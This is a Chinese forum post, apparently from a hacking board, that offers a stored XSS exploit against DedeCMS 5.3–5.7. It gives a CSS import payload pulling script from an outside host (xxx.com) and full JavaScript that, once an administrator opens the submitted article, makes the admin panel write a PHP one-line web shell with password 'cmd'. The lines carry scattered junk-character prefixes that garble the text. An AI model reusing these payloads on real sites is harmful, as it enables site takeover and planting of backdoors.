dedecms xss oday通杀所有版本 可getshell

admin

<DIV id=read_tpc mb10?>漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行。可getshell
为什么说它是ODay呢，能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个：
# D/ n% F7 _  h6 J& C& W, C1.开启注册
2.开启投稿
) Y$ E1 |) P- n/ V  q注册会员----发表文章
% I1 c& z; o' S8 F6 C内容填写：
复制代码
<style>@im\port'\http://xxx.com/xss.css';</style>
新建XSS.Css
3 ^8 N5 W' {% Y  x7 T4 e复制代码
; [# v8 `; _. C+ A' r+ q: {.body{
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
新建xss.js 内容为
3 O4 c9 E$ _) `% {# h% g% J复制代码
$ B8 t, D: U" W1.var request = false;
2.if(window.XMLHttpRequest) {
3.request = new XMLHttpRequest();
. W- I  i( N4 w3 w4.if(request.overrideMimeType) {
5.request.overrideMimeType('text/xml');
6.}
- c5 a2 o4 A0 R3 k7.} else if(window.ActiveXObject) {
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
9.for(var i=0; i<versions.length; i++) {
10.try {
11.request = new ActiveXObject(versions);
, I. L/ n* g0 U# j& ~2 R, w12.} catch(e) {}
13.}
+ E: y% f# l3 q/ g" y14.}
8 }4 C( Y) D% F* i5 L. Q, s: E15.xmlhttp=request;
& k, k+ J" S  @. B16.function getFolder( url ){
17. obj = url.split('/')
18. return obj[obj.length-2]
19.}
20.oUrl = top.location.href;
21.u = getFolder(oUrl);
22.add_admin();
23.function add_admin(){
24.var url= "/"+u+"/sys_sql_query.php";
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
% C3 b) f, O) ?0 l$ n26.xmlhttp.open("POST", url, true);
* ^( g; L9 L9 K27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
6 C$ L; ?' o1 m5 |28.xmlhttp.setRequestHeader("Content-length", params.length);
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
30.xmlhttp.send(params);
  i. U0 P- c, C$ f) F+ K1 E31.}
, P/ k7 O) h) t0 v& r# x当管理员审核这篇文章的时候，将自动在data目录生成一句话haris.php。密码cmd